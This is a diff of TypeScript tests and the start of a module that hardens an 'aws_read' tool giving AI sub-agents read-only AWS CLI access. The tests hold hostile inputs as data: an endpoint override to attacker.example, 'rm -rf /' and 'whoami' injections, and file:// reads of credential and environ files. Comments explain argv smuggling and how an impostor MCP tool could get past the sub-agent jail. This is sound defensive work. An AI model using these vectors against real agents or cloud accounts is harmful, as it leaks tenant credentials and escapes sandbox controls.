+    it('refuses a value for a zero-arity flag — the positional-smuggling vector', () => {
+        expect(validateAwsReadRequest({ ...ok, params: { '--no-paginate': '/app/config.json' } }))
+            .toMatch(/takes no value/);
+    });
+
+    it('accepts true for a zero-arity flag', () => {
+        expect(validateAwsReadRequest({ ...ok, params: { '--no-paginate': true } })).toBeNull();
+    });
+
+    it('accepts multi-value flags', () => {
+        expect(validateAwsReadRequest({ ...ok, params: { '--instance-ids': ['i-1', 'i-2'] } })).toBeNull();
+    });
+
+    it('refuses multiple values for a single-value flag, and empty values', () => {
+        expect(validateAwsReadRequest({ ...ok, params: { '--query': ['a', 'b'] } })).toMatch(/exactly one value/);
+        expect(validateAwsReadRequest({ ...ok, params: { '--query': [] } })).toMatch(/requires a value/);
+        expect(validateAwsReadRequest({ ...ok, params: { '--query': '' } })).toMatch(/non-empty strings/);
+    });
+
+    it('is not fooled by inherited Object properties', () => {
+        expect(validateAwsReadRequest({ ...ok, params: { 'constructor': 'x' } as never })).toMatch(/not a permitted flag/);
+        // Built with JSON.parse, not an object literal: a quoted __proto__ key in a
+        // literal SETS THE PROTOTYPE rather than creating an own property (spec
+        // B.3.1), so `{ '__proto__': 'x' }` is simply `{}` and would vacuously pass.
+        // Real tool args arrive as parsed JSON, where __proto__ IS an own property —
+        // which is the case worth pinning.
+        const params = JSON.parse('{"__proto__": "x"}');
+        expect(Object.prototype.hasOwnProperty.call(params, '__proto__')).toBe(true);
+        expect(validateAwsReadRequest({ ...ok, params })).toMatch(/not a permitted flag/);
+    });
+});
+
+describe('validateAwsReadRequest — the argv invariant (no value may look like a flag)', () => {
+    it('refuses a value that would be parsed as a flag, defeating the flag allowlist', () => {
+        // The flag allowlist constrains the KEYS of params; argparse decides what is
+        // a flag by looking at the TOKEN. A 'many' flag emits each array element as
+        // its own argv token, so this would have the CLI stop consuming
+        // --instance-ids at "--endpoint-url" and parse it as a flag — reaching every
+        // flag the allowlist exists to exclude.
+        expect(validateAwsReadRequest({ ...ok, params: { '--instance-ids': ['i-1', '--endpoint-url', 'https://attacker.example'] } }))
+            .toMatch(/must not begin with "-"/);
+        expect(validateAwsReadRequest({ ...ok, params: { '--query': '--cli-input-json' } }))
+            .toMatch(/must not begin with "-"/);
+        // "--" is the end-of-options marker: every token after it becomes a positional.
+        expect(validateAwsReadRequest({ ...ok, params: { '--filters': ['--'] } }))
+            .toMatch(/must not begin with "-"/);
+    });
+
+    it('refuses region and profile values that look like flags', () => {
+        // /^[a-z0-9-]+$/ matches the literal string "--endpoint-url", so the previous
+        // region pattern admitted an option-looking token into argv.
+        expect(validateAwsReadRequest({ ...ok, region: '--endpoint-url' })).toMatch(/invalid region/);
+        expect(validateAwsReadRequest({ ...ok, profile: '--profile' })).toMatch(/invalid profile/);
+    });
+
+    it('still accepts ordinary AWS values', () => {
+        expect(validateAwsReadRequest({
+            ...ok, region: 'us-gov-west-1', profile: 'nucleus_agent_111111111111_ro',
+            params: {
+                '--filters': ['Name=instance-state-name,Values=running', 'Name=tag:env,Values=prod'],
+                '--query': 'Reservations[].Instances[].InstanceId',
+                '--start-time': '2026-07-01T00:00:00Z',
+            },
+        })).toBeNull();
     });
 });
 
 describe('buildAwsReadArgv', () => {
-    it('emits service, operation, flags and json output — never a shell string', () => {
-        expect(buildAwsReadArgv({
-            service: 'ec2', operation: 'describe-instances',
-            region: 'us-east-1', profile: 'nucleus_agent_1',
-            params: { '--instance-ids': 'i-123' },
-        })).toEqual([
-            'ec2', 'describe-instances', '--region', 'us-east-1',
-            '--profile', 'nucleus_agent_1', '--instance-ids', 'i-123',
-            '--output', 'json',
-        ]);
+    it('emits service, operation, validated region/profile and json output', () => {
+        expect(buildAwsReadArgv({ ...ok, region: 'us-east-1', profile: 'nucleus_agent_1', params: { '--instance-ids': ['i-1', 'i-2'] } }))
+            .toEqual(['ec2', 'describe-instances', '--region', 'us-east-1', '--profile', 'nucleus_agent_1',
+                      '--instance-ids', 'i-1', 'i-2', '--output', 'json']);
     });
 
-    it('emits no positional arguments, so an outfile cannot be supplied', () => {
-        const argv = buildAwsReadArgv({ service: 's3api', operation: 'get-object', params: { '--bucket': 'b', '--key': 'k' } });
-        // Every element after the leading service+operation is a flag or a flag's value.
-        expect(argv.slice(2).filter((t, i, a) => !t.startsWith('--') && !a[i - 1]?.startsWith('--'))).toEqual([]);
+    it('emits a zero-arity flag alone, with no value token', () => {
+        expect(buildAwsReadArgv({ ...ok, params: { '--no-paginate': true } }))
+            .toEqual(['ec2', 'describe-instances', '--no-paginate', '--output', 'json']);
+    });
+
+    it('can never emit a positional argument (semantic, not shape-based)', () => {
+        // The previous suite checked argv SHAPE, which a smuggled positional satisfies
+        // by construction since it does follow a flag. Check the real property: every
+        // non-flag token must belong to a flag of declared non-zero arity.
+        const argv = buildAwsReadArgv({
+            ...ok, region: 'us-east-1', profile: 'p',
+            params: { '--instance-ids': ['i-1', 'i-2'], '--no-paginate': true, '--query': 'Reservations[]' },
+        });
+        const builderFlags = new Set(['--region', '--profile', '--output']);
+        let owner: string | null = null;
+        for (const token of argv.slice(2)) {
+            if (token.startsWith('--')) {
+                const arity = builderFlags.has(token) ? 'one' : ALLOWED_FLAGS[token];
+                expect(arity, `unexpected flag ${token}`).toBeDefined();
+                owner = arity === 'none' ? null : token;
+                continue;
+            }
+            expect(owner, `orphan positional "${token}"`).not.toBeNull();
+        }
     });
 
     it('treats injection attempts as inert argv data', () => {
-        // These never reach a shell, so they are values — not code. Validation
-        // refuses them anyway; this pins that argv construction does not concatenate.
-        const argv = buildAwsReadArgv({ service: 'ec2', operation: 'describe-instances', params: { '--filters': 'a; rm -rf /' } });
+        const argv = buildAwsReadArgv({ ...ok, params: { '--query': 'a; rm -rf /' } });
         expect(argv).toContain('a; rm -rf /');
-        expect(argv.join(' ')).not.toContain('&&');
+    });
+
+    it('does not read an arity from an inherited Object property', () => {
+        // Validation refuses this first, but the builder is exported and independently
+        // callable — "cannot emit a positional" must hold without trusting its caller.
+        const argv = buildAwsReadArgv({ ...ok, params: { 'constructor': 'x' } as never });
+        expect(argv).toEqual(['ec2', 'describe-instances', 'constructor', 'x', '--output', 'json']);
+    });
+});
+
+describe('ALLOWED_OPS contains no credential-returning or mutating entry', () => {
+    it('excludes the operations that killed the previous design', () => {
+        const forbidden = [
+            ['sts', 'get-session-token'], ['sts', 'get-federation-token'],
+            ['s3api', 'get-object'], ['ec2', 'get-password-data'],
+            ['ec2', 'get-console-output'], ['iam', 'get-credential-report'],
+            ['eks', 'get-token'], ['lambda', 'get-function'],
+        ] as const;
+        for (const [service, operation] of forbidden) {
+            expect(ALLOWED_OPS[service]?.has(operation) ?? false, `${service} ${operation}`).toBe(false);
+        }
+        // Services whose read surface returns credentials are absent wholesale.
+        for (const service of ['secretsmanager', 'ssm', 'sso', 'ecr', 'redshift', 'cognito-identity', 's3']) {
+            expect(Object.prototype.hasOwnProperty.call(ALLOWED_OPS, service), service).toBe(false);
+        }
+    });
+});
+
+describe('the jail permits aws_read and still refuses shell', () => {
+    it('allows aws_read — without this the tool is refused on every call', () => {
+        expect(isReadOnlyForSubagent('aws_read').allowed).toBe(true);
+    });
+
+    it('keeps aws_read through the filter alongside other read-only tools', () => {
+        expect(filterReadOnlyTools([
+            { name: 'aws_read' }, { name: 'get_aws_credentials' },
+            { name: 'execute_command' }, { name: 'dispatch_agent' },
+        ]).map(t => t.name)).toEqual(['aws_read', 'get_aws_credentials']);
     });
 });

--- a/apps/web-ui/lib/agent/aws-read-tool.test.ts
+++ b/apps/web-ui/lib/agent/aws-read-tool.test.ts
@@ -1,5 +1,5 @@
 import { describe, it, expect } from 'vitest';
-import { validateAwsReadRequest, buildAwsReadArgv, ALLOWED_FLAGS, ALLOWED_OPS } from './aws-read-tool';
+import { validateAwsReadRequest, buildAwsReadArgv, ALLOWED_FLAGS, ALLOWED_OPS, type ParamValue } from './aws-read-tool';
 import { isReadOnlyForSubagent, filterReadOnlyTools } from './subagent';
 
 const ok = { service: 'ec2', operation: 'describe-instances' };
@@ -127,6 +127,68 @@ describe('validateAwsReadRequest — the argv invariant (no value may look like 
                 '--start-time': '2026-07-01T00:00:00Z',
             },
         })).toBeNull();
+    });
+
+    it('does not reject any of the legitimate value shapes', () => {
+        // The invariant is only free if no real AWS value begins with "-". Each of
+        // these is a shape a sub-agent will actually produce.
+        const cases: Array<[string, ParamValue]> = [
+            ['--filters', 'Name=instance-state-name,Values=running'],
+            ['--query', 'Reservations[].Instances[]'],
+            ['--start-time', '2026-07-01T00:00:00Z'],
+            ['--start-time', '1751328000'],
+            ['--instance-ids', ['i-1', 'i-2']],
+            ['--no-paginate', true],
+        ];
+        for (const [flag, value] of cases) {
+            expect(validateAwsReadRequest({ ...ok, params: { [flag]: value } }), `${flag} ${JSON.stringify(value)}`).toBeNull();
+        }
+    });
+});
+
+describe('ALLOWED_OPS — the approved audit surface is callable', () => {
+    it('covers the operations a multi-account audit needs', () => {
+        const required: Array<[string, string]> = [
+            ['organizations', 'list-accounts'], ['organizations', 'describe-organization'],
+            ['cloudtrail', 'lookup-events'], ['cloudwatch', 'get-metric-data'],
+            ['s3api', 'get-bucket-policy'], ['s3api', 'get-public-access-block'],
+            ['s3api', 'list-objects-v2'], ['iam', 'get-policy-version'],
+            ['iam', 'get-role-policy'], ['acm', 'describe-certificate'],
+            ['kms', 'describe-key'], ['route53', 'list-resource-record-sets'],
+            ['cloudfront', 'list-distributions'], ['ec2', 'describe-instance-status'],
+            ['elbv2', 'describe-listeners'], ['rds', 'describe-db-cluster-snapshots'],
+            ['logs', 'get-log-events'], ['ce', 'get-cost-forecast'],
+        ];
+        for (const [service, operation] of required) {
+            expect(validateAwsReadRequest({ service, operation }), `${service} ${operation}`).toBeNull();
+        }
+    });
+
+    it('gives every allowlisted operation its required parameters', () => {
+        // An operation whose required flag is missing from ALLOWED_FLAGS is on the
+        // list but not actually callable — the uselessness that pushes users back
+        // toward a shell.
+        const required: Array<[string, string, Record<string, ParamValue>]> = [
+            ['elbv2', 'describe-target-health', { '--target-group-arn': 'arn:aws:elasticloadbalancing:x' }],
+            ['elbv2', 'describe-rules', { '--listener-arn': 'arn:aws:elasticloadbalancing:y' }],
+            ['eks', 'describe-cluster', { '--name': 'prod' }],
+            ['eks', 'describe-nodegroup', { '--cluster-name': 'prod', '--nodegroup-name': 'ng-1' }],
+            ['iam', 'get-policy-version', { '--policy-arn': 'arn:aws:iam::1:policy/p', '--version-id': 'v3' }],
+            ['iam', 'get-role-policy', { '--role-name': 'r', '--policy-name': 'p' }],
+            ['route53', 'list-resource-record-sets', { '--hosted-zone-id': 'Z123' }],
+            ['kms', 'describe-key', { '--key-id': 'alias/aws/s3' }],
+            ['acm', 'describe-certificate', { '--certificate-arn': 'arn:aws:acm::1:certificate/c' }],
+            ['cloudtrail', 'lookup-events', { '--lookup-attributes': ['AttributeKey=EventName,AttributeValue=RunInstances'], '--max-results': '50' }],
+            ['cloudwatch', 'get-metric-data', { '--metric-data-queries': ['file-free-json'], '--start-time': '2026-07-01T00:00:00Z', '--end-time': '2026-07-02T00:00:00Z' }],
+            ['s3api', 'list-objects-v2', { '--bucket': 'b', '--prefix': 'logs/', '--max-keys': '100' }],
+            ['organizations', 'list-accounts-for-parent', { '--parent-id': 'ou-1234' }],
+            ['logs', 'get-log-events', { '--log-group-name': '/aws/lambda/f', '--log-stream-name': 's', '--start-from-head': true }],
+            ['ce', 'get-dimension-values', { '--time-period': 'Start=2026-07-01,End=2026-07-02', '--dimension': 'SERVICE' }],
+            ['ec2', 'describe-instance-status', { '--include-all-instances': true }],
+        ];
+        for (const [service, operation, params] of required) {
+            expect(validateAwsReadRequest({ service, operation, params }), `${service} ${operation}`).toBeNull();
+        }
     });
 });
 

--- a/apps/web-ui/lib/agent/aws-read-tool.test.ts
+++ b/apps/web-ui/lib/agent/aws-read-tool.test.ts
@@ -1,5 +1,10 @@
-import { describe, it, expect } from 'vitest';
-import { validateAwsReadRequest, buildAwsReadArgv, ALLOWED_FLAGS, ALLOWED_OPS, type ParamValue } from './aws-read-tool';
+import { describe, it, expect, afterEach } from 'vitest';
+import { buildCommandEnv } from './tools';
+import {
+    validateAwsReadRequest, buildAwsReadArgv, ALLOWED_FLAGS, ALLOWED_OPS, VALUE_SHAPES,
+    type ParamValue, type ValueShape,
+} from './aws-read-tool';
+import { markSubagentReadOnlyTool } from './subagent-tool-marker';
 import { isReadOnlyForSubagent, filterReadOnlyTools } from './subagent';
 
 const ok = { service: 'ec2', operation: 'describe-instances' };
@@ -139,10 +144,97 @@ describe('validateAwsReadRequest — the argv invariant (no value may look like 
             ['--start-time', '1751328000'],
             ['--instance-ids', ['i-1', 'i-2']],
             ['--no-paginate', true],
+            ['--log-group-name', '/aws/lambda/my-fn'],
+            ['--bucket', 'my-bucket'],
+            ['--policy-arn', 'arn:aws:iam::111111111111:policy/ReadOnlyAccess'],
         ];
         for (const [flag, value] of cases) {
             expect(validateAwsReadRequest({ ...ok, params: { [flag]: value } }), `${flag} ${JSON.stringify(value)}`).toBeNull();
         }
+    });
+});
+
+describe('validateAwsReadRequest — positive value shapes', () => {
+    it('refuses a paramfile prefix on every service parameter', () => {
+        // THE ESCAPE THIS CLOSES. The AWS CLI dereferences file:// on a service
+        // parameter, reads the target, and echoes the whole file in its parse error —
+        // which aws_read returns to the model verbatim (`stdout || stderr`). Measured
+        // against the tenant credentials file:
+        //   Error parsing parameter '--time-period': Invalid JSON:
+        //   [nucleus_agent_t1]
+        //   aws_access_key_id = AKIA…
+        const targets = [
+            'file:///etc/passwd',
+            'file:///proc/1/environ',
+            'file:///tmp/nucleus-agent-creds/t1/credentials',
+            'fileb:///proc/self/environ',
+            'http://169.254.170.2/v2/credentials',
+            'https://attacker.example/x',
+        ];
+        // Every allowlisted service parameter, not a sample: the vector is the CLI's,
+        // so it applies to whichever flag the model happens to choose.
+        const valueFlags = Object.entries(ALLOWED_FLAGS).filter(([, spec]) => spec.arity !== 'none');
+        expect(valueFlags.length).toBeGreaterThan(90);
+        for (const [flag, spec] of valueFlags) {
+            for (const target of targets) {
+                const value = spec.arity === 'many' ? [target] : target;
+                expect(
+                    validateAwsReadRequest({ ...ok, params: { [flag]: value } }),
+                    `${flag} ${target}`,
+                ).toMatch(/URI scheme|does not match the expected/);
+            }
+        }
+    });
+
+    it('has no shape that can match a URI scheme — the shared check is a backstop, not the mechanism', () => {
+        // Stated as a property over the shapes themselves so a future shape cannot
+        // quietly re-open the hole by relying on the standalone scheme check.
+        for (const [name, matches] of Object.entries(VALUE_SHAPES)) {
+            for (const target of ['file:///etc/passwd', 'fileb://x', 'http://x/y', 'https://x/y', 's3://b/k']) {
+                expect(matches(target), `${name} matched ${target}`).toBe(false);
+            }
+        }
+    });
+
+    it('accepts the legitimate form of each shape', () => {
+        const cases: Array<[ValueShape, string[]]> = [
+            ['id', ['i-0abc123', 'my-bucket', '/aws/lambda/my-fn', 'alias/aws/s3', 'Z1D633PJN98FT9']],
+            ['name', ['My Security Group', '2026/07/26/[$LATEST]53f2a1', 'AWS/EC2', 'logs/', 'example.com.']],
+            ['code', ['RUNNING', 'ec2:instance', 'tag:env', 'UnblendedCost', 'DIMENSION']],
+            ['arn', ['arn:aws:elasticloadbalancing:us-east-1:111111111111:targetgroup/tg/abc',
+                     'arn:aws:iam::111111111111:policy/ReadOnlyAccess', 'prod-cluster']],
+            ['filter', ['Name=instance-state-name,Values=running', 'Name=tag:env,Values=prod,staging',
+                        'Start=2026-07-01,End=2026-07-02', '[{"Id":"m1","MetricStat":{"Period":300}}]']],
+            ['jmespath', ["Reservations[].Instances[?State.Name=='running'].[InstanceId,Tags[?Key=='Name'].Value|[0]]",
+                          'length(Reservations)', 'Buckets[0:5].Name', '{id: InstanceId}']],
+            ['expr', ['{ $.errorCode = "*Unauthorized*" }', 'fields @timestamp, @message | filter @message like /ERROR/',
+                      '?ERROR ?WARN']],
+            ['timestamp', ['2026-07-01T00:00:00Z', '2026-07-01T00:00:00.000+05:30', '2026-07-01', '1751328000', '1751328000000']],
+            ['int', ['1', '1000']],
+            ['token', ['eyJ2IjoxfQ==', 'AAEA-abc_123.def']],
+        ];
+        for (const [shape, values] of cases) {
+            for (const value of values) {
+                expect(VALUE_SHAPES[shape](value), `${shape} rejected ${value}`).toBe(true);
+            }
+        }
+    });
+
+    it('refuses a value that does not match its flag\'s declared shape', () => {
+        // Each of these is now caught by the SHAPE, not by a dash or a scheme.
+        expect(validateAwsReadRequest({ ...ok, params: { '--max-results': 'all' } }))
+            .toMatch(/expected int form/);
+        expect(validateAwsReadRequest({ ...ok, params: { '--start-time': 'yesterday' } }))
+            .toMatch(/expected timestamp form/);
+        expect(validateAwsReadRequest({ ...ok, params: { '--instance-ids': ['i-1', 'i 2; whoami'] } }))
+            .toMatch(/expected id form/);
+        expect(validateAwsReadRequest({ ...ok, params: { '--query': 'Reservations[]/../../etc' } }))
+            .toMatch(/expected jmespath form/);
+        expect(validateAwsReadRequest({ service: 'ce', operation: 'get-cost-and-usage', params: { '--time-period': 'not-a-pair' } }))
+            .toMatch(/expected filter form/);
+        // A JSON-looking value that does not actually parse is not a JSON document.
+        expect(validateAwsReadRequest({ ...ok, params: { '--filters': ['[{"Name":'] } }))
+            .toMatch(/expected filter form/);
     });
 });
 
@@ -169,22 +261,35 @@ describe('ALLOWED_OPS — the approved audit surface is callable', () => {
         // list but not actually callable — the uselessness that pushes users back
         // toward a shell.
         const required: Array<[string, string, Record<string, ParamValue>]> = [
-            ['elbv2', 'describe-target-health', { '--target-group-arn': 'arn:aws:elasticloadbalancing:x' }],
-            ['elbv2', 'describe-rules', { '--listener-arn': 'arn:aws:elasticloadbalancing:y' }],
+            ['elbv2', 'describe-target-health', { '--target-group-arn': 'arn:aws:elasticloadbalancing:us-east-1:111111111111:targetgroup/tg/abc' }],
+            ['elbv2', 'describe-rules', { '--listener-arn': 'arn:aws:elasticloadbalancing:us-east-1:111111111111:listener/app/lb/abc/def' }],
             ['eks', 'describe-cluster', { '--name': 'prod' }],
             ['eks', 'describe-nodegroup', { '--cluster-name': 'prod', '--nodegroup-name': 'ng-1' }],
-            ['iam', 'get-policy-version', { '--policy-arn': 'arn:aws:iam::1:policy/p', '--version-id': 'v3' }],
+            ['iam', 'get-policy-version', { '--policy-arn': 'arn:aws:iam::111111111111:policy/p', '--version-id': 'v3' }],
             ['iam', 'get-role-policy', { '--role-name': 'r', '--policy-name': 'p' }],
+            ['iam', 'get-user-policy', { '--user-name': 'alice', '--policy-name': 'p' }],
+            ['iam', 'list-access-keys', { '--user-name': 'alice' }],
             ['route53', 'list-resource-record-sets', { '--hosted-zone-id': 'Z123' }],
             ['kms', 'describe-key', { '--key-id': 'alias/aws/s3' }],
-            ['acm', 'describe-certificate', { '--certificate-arn': 'arn:aws:acm::1:certificate/c' }],
+            ['acm', 'describe-certificate', { '--certificate-arn': 'arn:aws:acm:us-east-1:111111111111:certificate/c' }],
             ['cloudtrail', 'lookup-events', { '--lookup-attributes': ['AttributeKey=EventName,AttributeValue=RunInstances'], '--max-results': '50' }],
-            ['cloudwatch', 'get-metric-data', { '--metric-data-queries': ['file-free-json'], '--start-time': '2026-07-01T00:00:00Z', '--end-time': '2026-07-02T00:00:00Z' }],
+            ['cloudwatch', 'get-metric-data', { '--metric-data-queries': ['[{"Id":"m1","MetricStat":{"Metric":{"Namespace":"AWS/EC2"},"Period":300,"Stat":"Average"}}]'], '--start-time': '2026-07-01T00:00:00Z', '--end-time': '2026-07-02T00:00:00Z' }],
+            ['cloudwatch', 'describe-alarm-history', { '--alarm-name': 'high-cpu', '--history-item-type': 'StateUpdate' }],
             ['s3api', 'list-objects-v2', { '--bucket': 'b', '--prefix': 'logs/', '--max-keys': '100' }],
+            ['s3api', 'list-object-versions', { '--bucket': 'b', '--key-marker': 'logs/2026', '--max-keys': '100' }],
             ['organizations', 'list-accounts-for-parent', { '--parent-id': 'ou-1234' }],
             ['logs', 'get-log-events', { '--log-group-name': '/aws/lambda/f', '--log-stream-name': 's', '--start-from-head': true }],
+            ['logs', 'start-query', { '--log-group-names': ['/aws/lambda/f'], '--start-time': '1751328000', '--end-time': '1751414400', '--query-string': 'fields @timestamp, @message | filter @message like /ERROR/' }],
+            ['logs', 'get-query-results', { '--query-id': 'abc123' }],
             ['ce', 'get-dimension-values', { '--time-period': 'Start=2026-07-01,End=2026-07-02', '--dimension': 'SERVICE' }],
+            ['ce', 'get-cost-and-usage', { '--time-period': 'Start=2026-07-01,End=2026-07-02', '--granularity': 'DAILY', '--metrics': ['UnblendedCost'], '--next-page-token': 'eyJ2IjoxfQ==' }],
             ['ec2', 'describe-instance-status', { '--include-all-instances': true }],
+            ['ec2', 'describe-network-acls', { '--network-acl-ids': ['acl-1'] }],
+            ['rds', 'describe-events', { '--source-identifier': 'db-1', '--source-type': 'db-instance', '--duration': '1440' }],
+            ['config', 'get-compliance-details-by-config-rule', { '--config-rule-name': 'required-tags', '--compliance-types': ['NON_COMPLIANT'] }],
+            ['guardduty', 'list-findings', { '--detector-id': 'abc', '--finding-criteria': '{"Criterion":{"severity":{"Gte":7}}}' }],
+            ['securityhub', 'get-findings', { '--filters': ['{"SeverityLabel":[{"Value":"CRITICAL","Comparison":"EQUALS"}]}'], '--max-results': '50' }],
+            ['accessanalyzer', 'list-findings', { '--analyzer-arn': 'arn:aws:access-analyzer:us-east-1:111111111111:analyzer/a' }],
         ];
         for (const [service, operation, params] of required) {
             expect(validateAwsReadRequest({ service, operation, params }), `${service} ${operation}`).toBeNull();
@@ -216,7 +321,7 @@ describe('buildAwsReadArgv', () => {
         let owner: string | null = null;
         for (const token of argv.slice(2)) {
             if (token.startsWith('--')) {
-                const arity = builderFlags.has(token) ? 'one' : ALLOWED_FLAGS[token];
+                const arity = builderFlags.has(token) ? 'one' : ALLOWED_FLAGS[token]?.arity;
                 expect(arity, `unexpected flag ${token}`).toBeDefined();
                 owner = arity === 'none' ? null : token;
                 continue;
@@ -225,16 +330,36 @@ describe('buildAwsReadArgv', () => {
         }
     });
 
+    it('enforces arity itself, so it cannot emit a positional for an unvalidated caller', () => {
+        // The builder is exported and independently callable. Called with input that
+        // never passed validation it used to emit whatever it was handed — and the
+        // second token of a 'one' flag is a POSITIONAL, which for `s3api get-object`
+        // is the outfile (an arbitrary local file write).
+        expect(buildAwsReadArgv({ service: 's3api', operation: 'get-object', params: { '--bucket': ['b', '/tmp/pwn'] } }))
+            .toEqual(['s3api', 'get-object', '--bucket', 'b', '--output', 'json']);
+        // A zero-arity flag never emits a value token, whatever the input claims.
+        expect(buildAwsReadArgv({ ...ok, params: { '--no-paginate': '/tmp/pwn' as never } }))
+            .toEqual(['ec2', 'describe-instances', '--no-paginate', '--output', 'json']);
+        // A flag that is not on the allowlist is dropped entirely rather than passed
+        // through as two bare tokens.
+        expect(buildAwsReadArgv({ ...ok, params: { '--endpoint-url': 'https://attacker.example' } }))
+            .toEqual(['ec2', 'describe-instances', '--output', 'json']);
+        // Non-string values leave no token behind either.
+        expect(buildAwsReadArgv({ ...ok, params: { '--query': { toString: () => 'x' } as never } }))
+            .toEqual(['ec2', 'describe-instances', '--output', 'json']);
+    });
+
     it('treats injection attempts as inert argv data', () => {
         const argv = buildAwsReadArgv({ ...ok, params: { '--query': 'a; rm -rf /' } });
         expect(argv).toContain('a; rm -rf /');
     });
 
     it('does not read an arity from an inherited Object property', () => {
-        // Validation refuses this first, but the builder is exported and independently
-        // callable — "cannot emit a positional" must hold without trusting its caller.
+        // A bare index would read ALLOWED_FLAGS['constructor'] as a defined spec.
+        // own() makes it unknown, and an unknown flag is now dropped rather than
+        // emitted as two bare tokens.
         const argv = buildAwsReadArgv({ ...ok, params: { 'constructor': 'x' } as never });
-        expect(argv).toEqual(['ec2', 'describe-instances', 'constructor', 'x', '--output', 'json']);
+        expect(argv).toEqual(['ec2', 'describe-instances', '--output', 'json']);
     });
 });
 
@@ -256,14 +381,90 @@ describe('ALLOWED_OPS contains no credential-returning or mutating entry', () =>
     });
 });
 
-describe('the jail permits aws_read and still refuses shell', () => {
-    it('allows aws_read — without this the tool is refused on every call', () => {
-        expect(isReadOnlyForSubagent('aws_read').allowed).toBe(true);
+describe('buildCommandEnv — the environment aws_read runs in', () => {
+    const AMBIENT = {
+        AWS_CONFIG_FILE: '/attacker/config',
+        AWS_CONTAINER_CREDENTIALS_RELATIVE_URI: '/v2/credentials/abc',
+        AWS_CONTAINER_CREDENTIALS_FULL_URI: 'http://169.254.170.2/creds',
+        AWS_ACCESS_KEY_ID: 'AKIATASKROLE',
+        AWS_SECRET_ACCESS_KEY: 'secret',
+        AWS_SESSION_TOKEN: 'token',
+        DATABASE_URL: 'postgres://x',
+        NEXTAUTH_SECRET: 's',
+    };
+
+    afterEach(() => {
+        for (const key of Object.keys(AMBIENT)) delete process.env[key];
     });
 
-    it('keeps aws_read through the filter alongside other read-only tools', () => {
+    it('pins the config file per tenant instead of inheriting an ambient one', () => {
+        // An inherited ~/.aws/config can set cli_follow_urlparam (http:// parameter
+        // values become fetches), credential_process (arbitrary command execution on
+        // profile resolution) and sso_*.
+        Object.assign(process.env, AMBIENT);
+        const env = buildCommandEnv('tenant-1');
+        expect(env.AWS_CONFIG_FILE).not.toBe('/attacker/config');
+        expect(env.AWS_CONFIG_FILE).toContain('tenant-1');
+        expect(env.AWS_SHARED_CREDENTIALS_FILE).toContain('tenant-1');
+        // Not inherited even when there is no tenant to pin it to.
+        expect(buildCommandEnv().AWS_CONFIG_FILE).toBeUndefined();
+    });
+
+    it('never hands the child the ECS task role — "no profile" must mean "no credentials"', () => {
+        // Load-bearing omission: with these present, an aws_read call with no
+        // --profile silently falls back to the PLATFORM's identity, outside every
+        // tenant scoping and outside the assumed-role audit trail.
+        Object.assign(process.env, AMBIENT);
+        const env = buildCommandEnv('tenant-1');
+        for (const key of ['AWS_CONTAINER_CREDENTIALS_RELATIVE_URI', 'AWS_CONTAINER_CREDENTIALS_FULL_URI',
+                           'AWS_ACCESS_KEY_ID', 'AWS_SECRET_ACCESS_KEY', 'AWS_SESSION_TOKEN',
+                           'DATABASE_URL', 'NEXTAUTH_SECRET']) {
+            expect(env[key], key).toBeUndefined();
+        }
+    });
+});
+
+describe('the jail exempts aws_read by identity, not by name', () => {
+    // A stand-in for the real tool: what matters is the marker, which only this
+    // process can stamp (a unique Symbol, not Symbol.for).
+    const realAwsRead = () => markSubagentReadOnlyTool({ name: 'aws_read' });
+
+    it('allows the marked instance — without this the tool is refused on every call', () => {
+        expect(isReadOnlyForSubagent('aws_read', {}, realAwsRead()).allowed).toBe(true);
+    });
+
+    it('refuses an impostor that merely claims the name', () => {
+        // mcp-manager.ts keeps remote MCP tool names UNPREFIXED, so a tenant-configured
+        // MCP server can expose a tool called `aws_read`. Under the old name-based
+        // exemption it was waved through the fail-closed jail AND, being last into
+        // toolsByName, shadowed the real tool.
+        for (const name of ['aws_read', 'AWS_READ', 'Aws_Read']) {
+            const verdict = isReadOnlyForSubagent(name, {}, { name });
+            expect(verdict.allowed, name).toBe(false);
+            expect(verdict.reason).toMatch(/not on the verified read-only list/);
+        }
+    });
+
+    it('gives a bare name no exemption at all', () => {
+        // isReadOnlyForSubagent(name) is called with a bare string in places; that
+        // path must stay fail-closed, because a string is exactly the claim an
+        // impostor can make.
+        expect(isReadOnlyForSubagent('aws_read').allowed).toBe(false);
+    });
+
+    it('a marked impostor cannot re-enable a denylisted name', () => {
+        // The denylist is checked BEFORE the marker, so marking cannot resurrect a
+        // shell or a recursive dispatch.
+        for (const name of ['execute_command', 'bash', 'dispatch_agent', 'ask_user']) {
+            const verdict = isReadOnlyForSubagent(name, {}, markSubagentReadOnlyTool({ name }));
+            expect(verdict.allowed, name).toBe(false);
+        }
+    });
+
+    it('keeps the marked aws_read through the filter and drops the impostor', () => {
         expect(filterReadOnlyTools([
-            { name: 'aws_read' }, { name: 'get_aws_credentials' },
+            realAwsRead(), { name: 'get_aws_credentials' },
+            { name: 'aws_read' },            // impostor, unmarked
             { name: 'execute_command' }, { name: 'dispatch_agent' },
         ]).map(t => t.name)).toEqual(['aws_read', 'get_aws_credentials']);
     });

--- a/apps/web-ui/lib/agent/aws-read-tool.ts
+++ b/apps/web-ui/lib/agent/aws-read-tool.ts
@@ -1,0 +1,135 @@
+/**
+ * aws_read — the ONLY route from a sub-agent to AWS.
+ *
+ * Sub-agents have no shell (see subagent.ts's denylist). This tool takes a
+ * structured request and builds argv itself, then runs `execFile` with
+ * shell: false. Nothing the model supplies is ever interpreted by a shell, so the
+ * escape classes that broke two previous designs — metacharacters, quoting,
+ * flag-order confusion, LD_PRELOAD prefixes, command substitution — are not
+ * merely blocked here, they are unrepresentable.
+ *
+ * Three further restrictions close what a structured call could still reach:
+ *  - no positional arguments, so `s3api get-object … OUTFILE` cannot write a file;
+ *  - a denied-flag set, so --endpoint-url cannot exfiltrate and --cli-input-json
+ *    cannot smuggle parameters past validation;
+ *  - a denied-operation set, so credential-minting reads (sts get-session-token,
+ *    ecr get-login-password) and mutating "get-" operations
+ *    (redshift get-cluster-credentials --auto-create) are refused by name.
+ */
+import { execFile } from 'child_process';
+import { promisify } from 'util';
+import { tool } from '@langchain/core/tools';
+import { z } from 'zod';
+import { buildCommandEnv } from './tools';
+
+const execFileAsync = promisify(execFile);
+
+const AWS_READ_TIMEOUT_MS = 120_000;
+const AWS_READ_MAX_BUFFER = 10 * 1024 * 1024;
+export const AWS_READ_OUTPUT_MAX_CHARS = 100_000;
+
+/** Read-only operation prefixes, by AWS CLI convention. */
+const READ_OPERATION_PREFIX = /^(describe|list|get|head|search|lookup|check|batch-get)-/;
+
+/** Operations that match the read prefix but mint credentials or mutate. */
